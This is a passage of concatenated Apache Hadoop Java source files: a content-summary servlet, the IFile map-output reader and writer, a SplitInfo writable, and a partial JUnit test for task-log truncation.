import org.apache.hadoop.hdfs.protocol.ClientProtocol;
import org.apache.hadoop.ipc.RemoteException;
import org.apache.hadoop.security.UserGroupInformation;
import org.apache.hadoop.util.ServletUtil;
import org.znerd.xmlenc.XMLOutputter;
/** Servlets for file checksum */
public class ContentSummaryServlet extends DfsServlet {
/** For java.io.Serializable */
private static final long serialVersionUID = 1L;
/** {@inheritDoc} */
public void doGet(final HttpServletRequest request,
final HttpServletResponse response) throws ServletException, IOException {
final Configuration conf =
(Configuration) getServletContext().getAttribute(JspHelper.CURRENT_CONF);
final UserGroupInformation ugi = getUGI(request, conf);
try {
ugi.doAs(new PrivilegedExceptionAction<Void>() {
@Override
public Void run() throws Exception {
final String path = ServletUtil.getDecodedPath(request, "/contentSummary");
final PrintWriter out = response.getWriter();
final XMLOutputter xml = new XMLOutputter(out, "UTF-8");
xml.declaration();
try {
//get content summary
final ClientProtocol nnproxy = createNameNodeProxy();
final ContentSummary cs = nnproxy.getContentSummary(path);
//write xml
xml.startTag(ContentSummary.class.getName());
if (cs != null) {
xml.attribute("length" , "" + cs.getLength());
xml.attribute("fileCount" , "" + cs.getFileCount());
xml.attribute("directoryCount", "" + cs.getDirectoryCount());
xml.attribute("quota" , "" + cs.getQuota());
xml.attribute("spaceConsumed" , "" + cs.getSpaceConsumed());
xml.attribute("spaceQuota" , "" + cs.getSpaceQuota());
}
xml.endTag();
} catch(IOException ioe) {
writeXml(ioe, path, xml);
}
xml.endDocument();
return null;
}
});
} catch (InterruptedException e) {
throw new IOException(e);
}
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/IFile.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred;
import java.io.DataInputStream;
import java.io.EOFException;
import java.io.IOException;
import java.io.InputStream;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.FSDataInputStream;
import org.apache.hadoop.fs.FSDataOutputStream;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.io.DataInputBuffer;
import org.apache.hadoop.io.DataOutputBuffer;
import org.apache.hadoop.io.WritableUtils;
import org.apache.hadoop.io.compress.CodecPool;
import org.apache.hadoop.io.compress.CompressionCodec;
import org.apache.hadoop.io.compress.CompressionOutputStream;
import org.apache.hadoop.io.compress.Compressor;
import org.apache.hadoop.io.compress.Decompressor;
import org.apache.hadoop.io.serializer.SerializationFactory;
import org.apache.hadoop.io.serializer.Serializer;
import org.apache.hadoop.util.Progressable;
/**
* <code>IFile</code> is the simple <key-len, value-len, key, value> format
* for the intermediate map-outputs in Map-Reduce.
*
* There is a <code>Writer</code> to write out map-outputs in this format and
* a <code>Reader</code> to read files of this format.
*/
public class IFile {
private static final Log LOG = LogFactory.getLog(IFile.class);
public static final int EOF_MARKER = -1; // End of File Marker
public static final int LEN_OF_EOF = 2 * WritableUtils
.getVIntSize(IFile.EOF_MARKER);
private static final int MAX_BYTES_TO_READ = 64 * 1024;
/**
* <code>IFile.Writer</code> to write out intermediate map-outputs.
*/
public static class Writer<K extends Object, V extends Object> implements
IStreamWriter, IWriter<K, V> {
FSDataOutputStream out;
boolean ownOutputStream = false;
long start = 0;
FSDataOutputStream rawOut;
CompressionOutputStream compressedOut;
Compressor compressor;
boolean compressOutput = false;
protected long decompressedBytesWritten = 0;
long compressedBytesWritten = 0;
// Count records written to disk
private long numRecordsWritten = 0;
private final Counters.Counter writtenRecordsCounter;
IFileOutputStream checksumOut;
Class<K> keyClass;
Class<V> valueClass;
Serializer<K> keySerializer;
Serializer<V> valueSerializer;
DataOutputBuffer buffer = new DataOutputBuffer();
public Writer(Configuration conf, FileSystem fs, Path file,
Class<K> keyClass, Class<V> valueClass,
CompressionCodec codec,
Counters.Counter writesCounter) throws IOException {
this(conf, fs.create(file), keyClass, valueClass, codec,
writesCounter);
ownOutputStream = true;
}
protected Writer(Counters.Counter writesCounter) {
writtenRecordsCounter = writesCounter;
}
public Writer(Configuration conf, FSDataOutputStream out,
Class<K> keyClass, Class<V> valueClass,
CompressionCodec codec, Counters.Counter writesCounter)
throws IOException {
this.writtenRecordsCounter = writesCounter;
this.checksumOut = new IFileOutputStream(out);
this.rawOut = out;
this.start = this.rawOut.getPos();
if (codec != null) {
this.compressor = CodecPool.getCompressor(codec);
if (this.compressor != null) {
this.compressor.reset();
this.compressedOut = codec.createOutputStream(checksumOut, compressor);
this.out = new FSDataOutputStream(this.compressedOut, null);
this.compressOutput = true;
} else {
LOG.warn("Could not obtain compressor from CodecPool");
this.out = new FSDataOutputStream(checksumOut,null);
}
} else {
this.out = new FSDataOutputStream(checksumOut,null);
}
this.keyClass = keyClass;
this.valueClass = valueClass;
if (keyClass != null) {
SerializationFactory serializationFactory = new SerializationFactory(
conf);
this.keySerializer = serializationFactory.getSerializer(keyClass);
this.keySerializer.open(buffer);
this.valueSerializer = serializationFactory.getSerializer(valueClass);
this.valueSerializer.open(buffer);
}
}
public Writer(Configuration conf, FileSystem fs, Path file)
throws IOException {
this(conf, fs, file, null, null, null, null);
}
public void close() throws IOException {
// When IFile writer is created by BackupStore, we do not have
// Key and Value classes set. So, check before closing the
// serializers
if (keyClass != null) {
keySerializer.close();
valueSerializer.close();
}
// Write EOF_MARKER for key/value length
WritableUtils.writeVInt(out, EOF_MARKER);
WritableUtils.writeVInt(out, EOF_MARKER);
decompressedBytesWritten += 2 * WritableUtils.getVIntSize(EOF_MARKER);
//Flush the stream
out.flush();
if (compressOutput) {
// Flush
compressedOut.finish();
compressedOut.resetState();
}
// Close the underlying stream iff we own it...
if (ownOutputStream) {
out.close();
}
else {
// Write the checksum
checksumOut.finish();
}
compressedBytesWritten = rawOut.getPos() - start;
if (compressOutput) {
// Return back the compressor
CodecPool.returnCompressor(compressor);
compressor = null;
}
out = null;
if(writtenRecordsCounter != null) {
writtenRecordsCounter.increment(numRecordsWritten);
}
}
public void append(K key, V value) throws IOException {
if (key.getClass() != keyClass)
throw new IOException("wrong key class: "+ key.getClass()
+" is not "+ keyClass);
if (value.getClass() != valueClass)
throw new IOException("wrong value class: "+ value.getClass()
+" is not "+ valueClass);
// Append the 'key'
keySerializer.serialize(key);
int keyLength = buffer.getLength();
if (keyLength < 0) {
throw new IOException("Negative key-length not allowed: " + keyLength +
" for " + key);
}
// Append the 'value'
valueSerializer.serialize(value);
int valueLength = buffer.getLength() - keyLength;
if (valueLength < 0) {
throw new IOException("Negative value-length not allowed: " +
valueLength + " for " + value);
}
// Write the record out
WritableUtils.writeVInt(out, keyLength); // key length
WritableUtils.writeVInt(out, valueLength); // value length
out.write(buffer.getData(), 0, buffer.getLength()); // data
// Reset
buffer.reset();
// Update bytes written
decompressedBytesWritten += keyLength + valueLength +
WritableUtils.getVIntSize(keyLength) +
WritableUtils.getVIntSize(valueLength);
++numRecordsWritten;
}
public void append(DataInputBuffer key, DataInputBuffer value)
throws IOException {
int keyLength = key.getLength() - key.getPosition();
if (keyLength < 0) {
throw new IOException("Negative key-length not allowed: " + keyLength +
" for " + key);
}
int valueLength = value.getLength() - value.getPosition();
if (valueLength < 0) {
throw new IOException("Negative value-length not allowed: " +
valueLength + " for " + value);
}
WritableUtils.writeVInt(out, keyLength);
WritableUtils.writeVInt(out, valueLength);
out.write(key.getData(), key.getPosition(), keyLength);
out.write(value.getData(), value.getPosition(), valueLength);
// Update bytes written
decompressedBytesWritten += keyLength + valueLength +
WritableUtils.getVIntSize(keyLength) +
WritableUtils.getVIntSize(valueLength);
++numRecordsWritten;
}
/**
* streaming write to output stream.
*/
public void write(byte[] b, int offset, int length) throws IOException {
this.out.write(b, offset, length);
decompressedBytesWritten += length;
}
public long getRawLength() {
return decompressedBytesWritten;
}
public long getCompressedLength() {
return compressedBytesWritten;
}
}
/**
* interface for writing records.
*
* @author Administrator
* @param <K>
* @param <V>
*/
public interface IWriter<K, V> {
public void append(K key, V value) throws IOException;
public void append(DataInputBuffer key, DataInputBuffer value)
throws IOException;
public void close() throws IOException;
public long getRawLength();
public long getCompressedLength();
}
/***
* interface for writing byte streaming data.
*
* @author Administrator
*/
public interface IStreamWriter {
public void write(byte[] b, int offset, int length) throws IOException;
public void close() throws IOException;
}
/***
* interface for reading records
*
* @author Administrator
*/
public interface IReader {
public long getLength();
public long getPosition() throws IOException;
public boolean nextRawKey(DataInputBuffer key) throws IOException;
public void nextRawValue(DataInputBuffer value) throws IOException;
public void close() throws IOException;
public void reset(int offset);
}
/***
* interface for dumping data bytes.
*
* @author Administrator
*/
public interface IDump {
public void dumpTo(
IStreamWriter writer,
Progressable progressable,
Configuration conf) throws IOException;
}
/*
* public static interface IWriter<K,V> { public void append(K key, V value)
* throws IOException; public void append(DataInputBuffer key, DataInputBuffer
* value); public long getRawLength(); public long getCompressedLength(); }
*/
/**
* <code>IFile.Reader</code> to read intermediate map-outputs.
*/
public static class Reader<K extends Object, V extends Object> implements
IReader, IDump {
private static final int DEFAULT_BUFFER_SIZE = 128 * 1024;
private static final int MAX_VINT_SIZE = 9;
// Count records read from disk
private long numRecordsRead = 0;
private final Counters.Counter readRecordsCounter;
final InputStream in; // Possibly decompressed stream that we read
Decompressor decompressor;
public long bytesRead = 0;
protected final long fileLength;
protected final long rawLen;
protected boolean eof = false;
final IFileInputStream checksumIn;
protected byte[] buffer = null;
protected int bufferSize = DEFAULT_BUFFER_SIZE;
protected DataInputBuffer dataIn = new DataInputBuffer();
protected int recNo = 1;
protected int currentKeyLength;
protected int currentValueLength;
// for inputstream back by disk file, hasStream is Ture
// for inputstream back by byte array, hasStream is false
private final boolean hasStream;
/**
* Construct an IFile Reader.
*
* @param conf Configuration File
* @param fs FileSystem
* @param file Path of the file to be opened. This file should have
* checksum bytes for the data at the end of the file.
* @param codec codec
* @param readsCounter Counter for records read from disk
* @throws IOException
*/
public Reader(Configuration conf, FileSystem fs, Path file,
CompressionCodec codec,
Counters.Counter readsCounter) throws IOException {
this(conf, fs.open(file),
fs.getFileStatus(file).getLen(),
codec, readsCounter);
}
public Reader(Configuration conf,
FSDataInputStream in,
long length,
CompressionCodec codec,
Counters.Counter readsCounter) throws IOException {
this(conf, in, length, -1, codec, readsCounter);
}
/**
* Construct an IFile Reader.
*
* @param conf Configuration File
* @param in The input stream
* @param length Length of the data in the stream, including the checksum
* bytes.
* @param codec codec
* @param readsCounter Counter for records read from disk
* @throws IOException
*/
public Reader(Configuration conf,
FSDataInputStream in,
long length,
long rawLen,
CompressionCodec codec,
Counters.Counter readsCounter) throws IOException {
hasStream = (in != null);
readRecordsCounter = readsCounter;
checksumIn = new IFileInputStream(in,length);
if (codec != null) {
decompressor = CodecPool.getDecompressor(codec);
if (decompressor != null) {
this.in = codec.createInputStream(checksumIn, decompressor);
} else {
LOG.warn("Could not obtain decompressor from CodecPool");
this.in = checksumIn;
}
} else {
this.in = checksumIn;
}
this.fileLength = length;
this.rawLen = rawLen;
if (conf != null) {
bufferSize = conf.getInt("io.file.buffer.size", DEFAULT_BUFFER_SIZE);
}
}
/***
* to verify the EOF marker matches
*
* @param din
* @throws IOException
*/
protected static void verifyEOF(DataInputStream din) throws IOException {
int eof1 = WritableUtils.readVInt(din);
int eof2 = WritableUtils.readVInt(din);
if (eof1 != IFile.EOF_MARKER || eof2 != IFile.EOF_MARKER) {
throw new IOException(" the eof marker " + eof1 + " and " + eof2
+ " can't match IFILE.EOF_MARKER " + IFile.EOF_MARKER);
}
}
public long getLength() {
return fileLength - checksumIn.getSize();
}
public long getPosition() throws IOException {
return checksumIn.getPosition();
}
/**
* Read upto len bytes into buf starting at offset off.
*
* @param buf buffer
* @param off offset
* @param len length of buffer
* @return the no. of bytes read
* @throws IOException
*/
private int readData(byte[] buf, int off, int len) throws IOException {
int bytesRead = 0;
while (bytesRead < len) {
int n = in.read(buf, off+bytesRead, len-bytesRead);
if (n < 0) {
return bytesRead;
}
bytesRead += n;
}
return len;
}
void readNextBlock(int minSize) throws IOException {
if (buffer == null) {
buffer = new byte[bufferSize];
dataIn.reset(buffer, 0, 0);
}
buffer =
rejigData(buffer,
(bufferSize < minSize) ? new byte[minSize << 1] : buffer);
bufferSize = buffer.length;
}
private byte[] rejigData(byte[] source, byte[] destination)
throws IOException{
// Copy remaining data into the destination array
int bytesRemaining = dataIn.getLength()-dataIn.getPosition();
if (bytesRemaining > 0) {
System.arraycopy(source, dataIn.getPosition(),
destination, 0, bytesRemaining);
}
// Read as much data as will fit from the underlying stream
int n = readData(destination, bytesRemaining,
(destination.length - bytesRemaining));
dataIn.reset(destination, 0, (bytesRemaining + n));
return destination;
}
protected boolean positionToNextRecord(DataInputBuffer dataIn)
throws IOException {
// Sanity check
if (eof) {
throw new EOFException("Completed reading " + bytesRead);
}
if (hasStream) {
// Check if we have enough data to read lengths
if ((dataIn.getLength() - dataIn.getPosition()) < 2 * MAX_VINT_SIZE) {
readNextBlock(2 * MAX_VINT_SIZE);
}
}
// Read key and value lengths
int oldPos = dataIn.getPosition();
currentKeyLength = WritableUtils.readVInt(dataIn);
currentValueLength = WritableUtils.readVInt(dataIn);
int pos = dataIn.getPosition();
bytesRead += pos - oldPos;
// Check for EOF
if (currentKeyLength == EOF_MARKER && currentValueLength == EOF_MARKER) {
eof = true;
return false;
}
// Sanity check
if (currentKeyLength < 0) {
throw new IOException("Rec# " + recNo + ": Negative key-length: "
+ currentKeyLength);
}
if (currentValueLength < 0) {
throw new IOException("Rec# " + recNo + ": Negative value-length: "
+ currentValueLength);
}
return true;
}
public boolean nextRawKey(DataInputBuffer key) throws IOException {
if (!positionToNextRecord(dataIn)) {
return false;
}
final int recordLength = currentKeyLength + currentValueLength;
int pos = dataIn.getPosition();
// Check if we have the raw key/value in the buffer
if ((dataIn.getLength() - pos) < recordLength) {
readNextBlock(recordLength);
// Sanity check
if ((dataIn.getLength() - dataIn.getPosition()) < recordLength) {
throw new EOFException("Rec# " + recNo + ": Could read the next "
+ " record");
}
}
pos = dataIn.getPosition();
byte[] data = dataIn.getData();
key.reset(data, pos, currentKeyLength);
long skipped = dataIn.skip(currentKeyLength);
// Position for the next record
if (skipped != currentKeyLength) {
throw new IOException("Rec# " + recNo
+ ": Failed to skip past key of length: " + currentKeyLength);
}
bytesRead += currentKeyLength;
return true;
}
public void nextRawValue(DataInputBuffer value) throws IOException {
value.reset(dataIn.getData(), dataIn.getPosition(), currentValueLength);
// Position for the next record
long skipped = dataIn.skip(currentValueLength);
if (skipped != currentValueLength) {
throw new IOException("Rec# " + recNo
+ ": Failed to skip past value of length: " + currentValueLength);
}
// Record the bytes read
bytesRead += currentValueLength;
++recNo;
++numRecordsRead;
}
public void close() throws IOException {
// Close the underlying stream
in.close();
// Release the buffer
dataIn = null;
buffer = null;
if (readRecordsCounter != null) {
readRecordsCounter.increment(numRecordsRead);
}
// Return the decompressor
if (decompressor != null) {
decompressor.reset();
CodecPool.returnDecompressor(decompressor);
decompressor = null;
}
}
public void reset(int offset) {
return;
}
private static int readData(InputStream in, byte[] buf, int off, int len)
throws IOException {
int bytesRead = 0;
while (bytesRead < len) {
int n = in.read(buf, off + bytesRead, len - bytesRead);
if (n < 0) {
return bytesRead;
}
bytesRead += n;
}
return len;
}
/***
* this implementation is for file based inputstream.
*/
@Override
public void dumpTo(
IStreamWriter writer,
Progressable progressable,
Configuration conf) throws IOException {
// TODO make it configurable?
byte[] buffer = new byte[MAX_BYTES_TO_READ];
long rawLength = rawLen - LEN_OF_EOF;
long sum = 0;
while (sum < rawLength) {
int count = readData(in, buffer, 0, Math.min(MAX_BYTES_TO_READ,
(int) (rawLength - sum)));
sum += count;
writer.write(buffer, 0, count);
progressable.progress();
}
buffer = null;
verifyEOF(new DataInputStream(in));
}
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/SplitInfo.java<|end_filename|>
package org.apache.hadoop.mapred;
import java.io.DataInput;
import java.io.DataOutput;
import java.io.IOException;
import org.apache.hadoop.io.Writable;
public class SplitInfo implements Writable {
private String inputSplitClass;
private byte[] inputSplitObject;
private long inputDataLength;
private String[] locations;
public SplitInfo(String inputSplitClass, byte[] inputSplitObject, long inputDataLength, String[] locations) {
this.setInputSplitClass(inputSplitClass);
this.setInputSplitObject(inputSplitObject);
this.inputDataLength = inputDataLength;
this.locations = locations;
}
SplitInfo() {
}
@Override
public void readFields(DataInput in) throws IOException {
setInputSplitClass(in.readUTF());
int len = in.readInt();
setInputSplitObject(new byte[len]);
in.readFully(getInputSplitObject());
inputDataLength = in.readLong();
int locationNum = in.readInt();
locations = new String[locationNum];
for(int i = 0; i < locationNum; ++i)
locations[i] = in.readUTF();
}
@Override
public void write(DataOutput out) throws IOException {
out.writeUTF(getInputSplitClass());
out.writeInt(getInputSplitObject().length);
out.write(getInputSplitObject());
out.writeLong(inputDataLength);
out.writeInt(locations.length);
for(String location : locations)
out.writeUTF(location);
}
public void setInputSplitObject(byte[] inputSplitObject) {
this.inputSplitObject = inputSplitObject;
}
public byte[] getInputSplitObject() {
return inputSplitObject;
}
public void setInputSplitClass(String inputSplitClass) {
this.inputSplitClass = inputSplitClass;
}
public String getInputSplitClass() {
return inputSplitClass;
}
public void setInputDataLength(long inputDataLength) {
this.inputDataLength = inputDataLength;
}
public long getInputDataLength() {
return inputDataLength;
}
public void setLocations(String[] locations) {
this.locations = locations;
}
public String[] getLocations() {
return locations;
}
}
<|start_filename|>src/test/org/apache/hadoop/mapred/TestTaskLogsTruncater.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred;
import java.io.DataOutputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.net.URI;
import java.util.Arrays;
import java.util.HashMap;
import java.util.Map;
import java.util.Random;
import org.apache.commons.logging.LogFactory;
import org.apache.commons.logging.Log;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.filecache.DistributedCache;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.FileUtil;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.io.LongWritable;
import org.apache.hadoop.io.Text;
import org.apache.hadoop.mapred.TaskLog.LogFileDetail;
import org.apache.hadoop.mapred.TaskLog.LogName;
import org.apache.hadoop.mapred.lib.IdentityMapper;
import org.apache.hadoop.mapreduce.server.tasktracker.JVMInfo;
import org.apache.hadoop.mapreduce.server.tasktracker.userlogs.JvmFinishedEvent;
import org.apache.hadoop.mapreduce.server.tasktracker.userlogs.UserLogManager;
import org.apache.hadoop.mapreduce.split.JobSplit;
import org.junit.After;
import org.junit.Ignore;
import org.junit.Test;
import static org.junit.Assert.*;
/**
* Verify the logs' truncation functionality.
*/
public class TestTaskLogsTruncater {
static final Log LOG = LogFactory.getLog(TestTaskLogsTruncater.class);
private static int truncatedMsgSize = TaskLogsTruncater.TRUNCATED_MSG.getBytes().length;
/**
* clean-up any stale directories after enabling writable permissions for all
* attempt-dirs.
*
* @throws IOException
*/
@After
public void tearDown() throws IOException {
File logDir = TaskLog.getUserLogDir();
for (File attemptDir : logDir.listFiles()) {
attemptDir.setWritable(true);
FileUtil.fullyDelete(attemptDir);
}
}
private void writeBytes(TaskAttemptID firstAttemptID, TaskAttemptID attemptID,
LogName logName, long numBytes, boolean random, char data) throws IOException {
File logFile = TaskLog.getTaskLogFile(firstAttemptID, false, logName);
File logLocation = logFile.getParentFile();
LOG.info("Going to write " + numBytes + " real bytes to the log file "
+ logFile);
if (!logLocation.exists()
&& !logLocation.mkdirs()) {
throw new IOException("Couldn't create all ancestor dirs for "
+ logFile);
}
File attemptDir = TaskLog.getAttemptDir(attemptID, false);
if (!attemptDir.exists() && !attemptDir.mkdirs()) {
throw new IOException("Couldn't create all ancestor dirs for "
+ logFile);
}
// Need to call up front to set currenttaskid.
TaskLog.syncLogs(logLocation.toString(), attemptID, false, true);
FileOutputStream outputStream = new FileOutputStream(logFile, true);
Random r = new Random();
for (long i = 0; i < numBytes; i++) {
if(random) {
outputStream.write(r.nextInt());
} else {
outputStream.write(data);
}
}
outputStream.close();
TaskLog.syncLogs(logLocation.toString(), attemptID, false, true);
LOG.info("Written " + logFile.length() + " real bytes to the log file "
+ logFile);
}
private void writeRandomBytes(TaskAttemptID firstAttemptID,
TaskAttemptID attemptID, LogName logName, long numBytes)
throws IOException {
writeBytes(firstAttemptID, attemptID, logName, numBytes, true, ' ');
}
private void writeRealChars(TaskAttemptID firstAttemptID,
TaskAttemptID attemptID, LogName logName, long numChars, char data)
throws IOException {
writeBytes(firstAttemptID, attemptID, logName, numChars, false, data);
}
private static Map<LogName, Long> getAllLogsFileLengths(
TaskAttemptID tid, boolean isCleanup) throws IOException {
Map<LogName, Long> allLogsFileLengths = new HashMap<LogName, Long>();
// If the index file doesn't exist, we cannot get log-file lengths. So set
// them to zero.
if (!TaskLog.getIndexFile(tid, isCleanup).exists()) {
for (LogName log : LogName.values()) {
allLogsFileLengths.put(log, Long.valueOf(0));
}
return allLogsFileLengths;
}
Map<LogName, LogFileDetail> logFilesDetails =
TaskLog.getAllLogsFileDetails(tid, isCleanup);
for (LogName log : logFilesDetails.keySet()) {
allLogsFileLengths.put(log,
Long.valueOf(logFilesDetails.get(log).length));
}
return allLogsFileLengths;
}
private Configuration setRetainSizes(long mapRetainSize,
long reduceRetainSize) {
Configuration conf = new Configuration();
conf.setLong(TaskLogsTruncater.MAP_USERLOG_RETAIN_SIZE, mapRetainSize);
conf.setLong(TaskLogsTruncater.REDUCE_USERLOG_RETAIN_SIZE, reduceRetainSize);
return conf;
}
/**
* Test cases which don't need any truncation of log-files. Without JVM-reuse.
*
* @throws IOException
*/
@Test
public void testNoTruncationNeeded() throws IOException {
Configuration conf = setRetainSizes(1000L, 1000L);
TaskLogsTruncater trunc = new TaskLogsTruncater(conf);
TaskID baseId = new TaskID();
int taskcount = 0;
TaskAttemptID attemptID = new TaskAttemptID(baseId, taskcount++);
//Task task = new MapTask(null, attemptID, 0, new JobSplit.TaskSplitIndex(),
// 0);
// Let the tasks write logs within retain-size
for (LogName log : LogName.values()) {
writeRandomBytes(attemptID, attemptID, log, 500);
}
File logIndex = TaskLog.getIndexFile(attemptID, false);
long indexModificationTimeStamp = logIndex.lastModified();
File attemptDir = TaskLog.getAttemptDir(attemptID, false);
assertTrue(attemptDir + " doesn't exist!", attemptDir.exists());
assertEquals("index file got modified", indexModificationTimeStamp,
logIndex.lastModified());
// Finish the task and the JVM too.
JVMInfo jvmInfo = null;
trunc.truncateLogs(jvmInfo);
// There should be no truncation of the log-file.
assertTrue(attemptDir.exists());
assertEquals("index file got modified", indexModificationTimeStamp,
logIndex.lastModified());
Map<LogName, Long> logLengths = getAllLogsFileLengths(attemptID, false);
for (LogName log : LogName.values()) {
File logFile = TaskLog.getTaskLogFile(attemptID, false, log);
assertEquals(500, logFile.length());
// The index file should also be proper.
assertEquals(500, logLengths.get(log).longValue());
}
// truncate it once again
trunc.truncateLogs(jvmInfo);
assertEquals("index file got modified", indexModificationTimeStamp,
logIndex.lastModified());
logLengths = getAllLogsFileLengths(attemptID, false);
for (LogName log : LogName.values()) {
File logFile = TaskLog.getTaskLogFile(attemptID, false, log);
assertEquals(500, logFile.length());
// The index file should also be proper.
assertEquals(500, logLengths.get(log).longValue());
}
}
/**
* Test the disabling of truncation of log-file.
*
* @throws IOException
*/
@Test
public void testDisabledLogTruncation() throws IOException {
// Anything less than 0 disables the truncation.
Configuration conf = setRetainSizes(-1L, -1L);
TaskLogsTruncater trunc = new TaskLogsTruncater(conf);
TaskID baseId = new TaskID();
int taskcount = 0;
TaskAttemptID attemptID = new TaskAttemptID(baseId, taskcount++);
Task task = null;
// Let the tasks write some logs
for (LogName log : LogName.values()) {
writeRandomBytes(attemptID, attemptID, log, 1500);
}
File attemptDir = TaskLog.getAttemptDir(attemptID, false);
assertTrue(attemptDir + " doesn't exist!", attemptDir.exists());
// Finish the task and the JVM too.
JVMInfo jvmInfo = new JVMInfo(attemptDir, Arrays.asList(task));
trunc.truncateLogs(jvmInfo);
// The log-file should not be truncated.
assertTrue(attemptDir.exists());
Map<LogName, Long> logLengths = getAllLogsFileLengths(attemptID, false);
for (LogName log : LogName.values()) {
File logFile = TaskLog.getTaskLogFile(attemptID, false, log);
assertEquals(1500, logFile.length());
// The index file should also be proper.
assertEquals(1500, logLengths.get(log).longValue());
}
}
/**
* Test the truncation of log-file when JVMs are not reused.
*
* @throws IOException
*/
@Test
public void testLogTruncationOnFinishing() throws IOException {
Configuration conf = setRetainSizes(1000L, 1000L);
TaskLogsTruncater trunc = new TaskLogsTruncater(conf);
TaskID baseId = new TaskID();
int taskcount = 0;
TaskAttemptID attemptID = new TaskAttemptID(baseId, taskcount++);
Task task = null;
// Let the tasks write logs more than retain-size
for (LogName log : LogName.values()) {
writeRandomBytes(attemptID, attemptID, log, 1500);
}
File attemptDir = TaskLog.getAttemptDir(attemptID, false);
assertTrue(attemptDir + " doesn't exist!", attemptDir.exists());
// Finish the task and the JVM too.
JVMInfo jvmInfo = new JVMInfo(attemptDir, Arrays.asList(task));
trunc.truncateLogs(jvmInfo);
// The log-file should now be truncated.
assertTrue(attemptDir.exists());
Map<LogName, Long> logLengths = getAllLogsFileLengths(attemptID, false);
for (LogName log : LogName.values()) {
File logFile = TaskLog.getTaskLogFile(attemptID, false, log);
assertEquals(1000 + truncatedMsgSize, logFile.length());
// The index file should also be proper.
assertEquals(1000 + truncatedMsgSize, logLengths.get(log).longValue());
}
// truncate once again
logLengths = getAllLogsFileLengths(attemptID, false);
for (LogName log : LogName.values()) {
File logFile = TaskLog.getTaskLogFile(attemptID, false, log);
assertEquals(1000 + truncatedMsgSize, logFile.length());
// The index file should also be proper.
assertEquals(1000 + truncatedMsgSize, logLengths.get(log).longValue());
}
}
/**
* Test the truncation of log-file.
*
* It writes two log files and truncates one, does not truncate other.
*
* @throws IOException
*/
@Test
public void testLogTruncation() throws IOException {
Configuration conf = setRetainSizes(1000L, 1000L);
TaskLogsTruncater trunc = new TaskLogsTruncater(conf);
TaskID baseId = new TaskID();
int taskcount = 0;
TaskAttemptID attemptID = new TaskAttemptID(baseId, taskcount++);
Task task = null;
// Let the tasks write logs more than retain-size
writeRandomBytes(attemptID, attemptID, LogName.SYSLOG, 1500);
writeRandomBytes(attemptID, attemptID, LogName.STDERR, 500);
File attemptDir = TaskLog.getAttemptDir(attemptID, false);
assertTrue(attemptDir + " doesn't exist!", attemptDir.exists());
// Finish the task and the JVM too.
JVMInfo jvmInfo = new JVMInfo(attemptDir, Arrays.asList(task));
trunc.truncateLogs(jvmInfo);
// The log-file should now be truncated.
assertTrue(attemptDir.exists());
Map<LogName, Long> logLengths = getAllLogsFileLengths(attemptID, false);
File logFile = TaskLog.getTaskLogFile(attemptID, false, LogName.SYSLOG);
assertEquals(1000 + truncatedMsgSize, logFile.length());
// The index file should also be proper.
assertEquals(1000 + truncatedMsgSize, logLengths.get(LogName.SYSLOG)
.longValue());
String syslog = TestMiniMRMapRedDebugScript.readTaskLog(LogName.SYSLOG,
attemptID, false);
assertTrue(syslog.startsWith(TaskLogsTruncater.TRUNCATED_MSG));
logFile = TaskLog.getTaskLogFile(attemptID, false, LogName.STDERR);
assertEquals(500, logFile.length());
// The index file should also be proper.
assertEquals(500, logLengths.get(LogName.STDERR).longValue());
String stderr = TestMiniMRMapRedDebugScript.readTaskLog(LogName.STDERR,
attemptID, false);
assertFalse(stderr.startsWith(TaskLogsTruncater.TRUNCATED_MSG));
// truncate once again
trunc.truncateLogs(jvmInfo);
logLengths = getAllLogsFileLengths(attemptID, false);
logFile = TaskLog.getTaskLogFile(attemptID, false, LogName.SYSLOG);
assertEquals(1000 + truncatedMsgSize, logFile.length());
// The index file should also be proper.
assertEquals(1000 + truncatedMsgSize, logLengths.get(LogName.SYSLOG)
.longValue());
logFile = TaskLog.getTaskLogFile(attemptID, false, LogName.STDERR);
assertEquals(500, logFile.length());
// The index file should also be proper.
assertEquals(500, logLengths.get(LogName.STDERR).longValue());
}
/**
* Test the truncation of log-file when JVM-reuse is enabled.
*
* @throws IOException
*/
@Test
public void testLogTruncationOnFinishingWithJVMReuse() throws IOException {
Configuration conf = setRetainSizes(150L, 150L);
TaskLogsTruncater trunc = new TaskLogsTruncater(conf);
TaskID baseTaskID = new TaskID();
int attemptsCount = 0;
// Assuming the job's retain size is 150
TaskAttemptID attempt1 = new TaskAttemptID(baseTaskID, attemptsCount++);
Task task1 = null;
// Let the tasks write logs more than retain-size
writeRealChars(attempt1, attempt1, LogName.SYSLOG, 200, 'A');
File attemptDir = TaskLog.getAttemptDir(attempt1, false);
assertTrue(attemptDir + " doesn't exist!", attemptDir.exists());
// Start another attempt in the same JVM
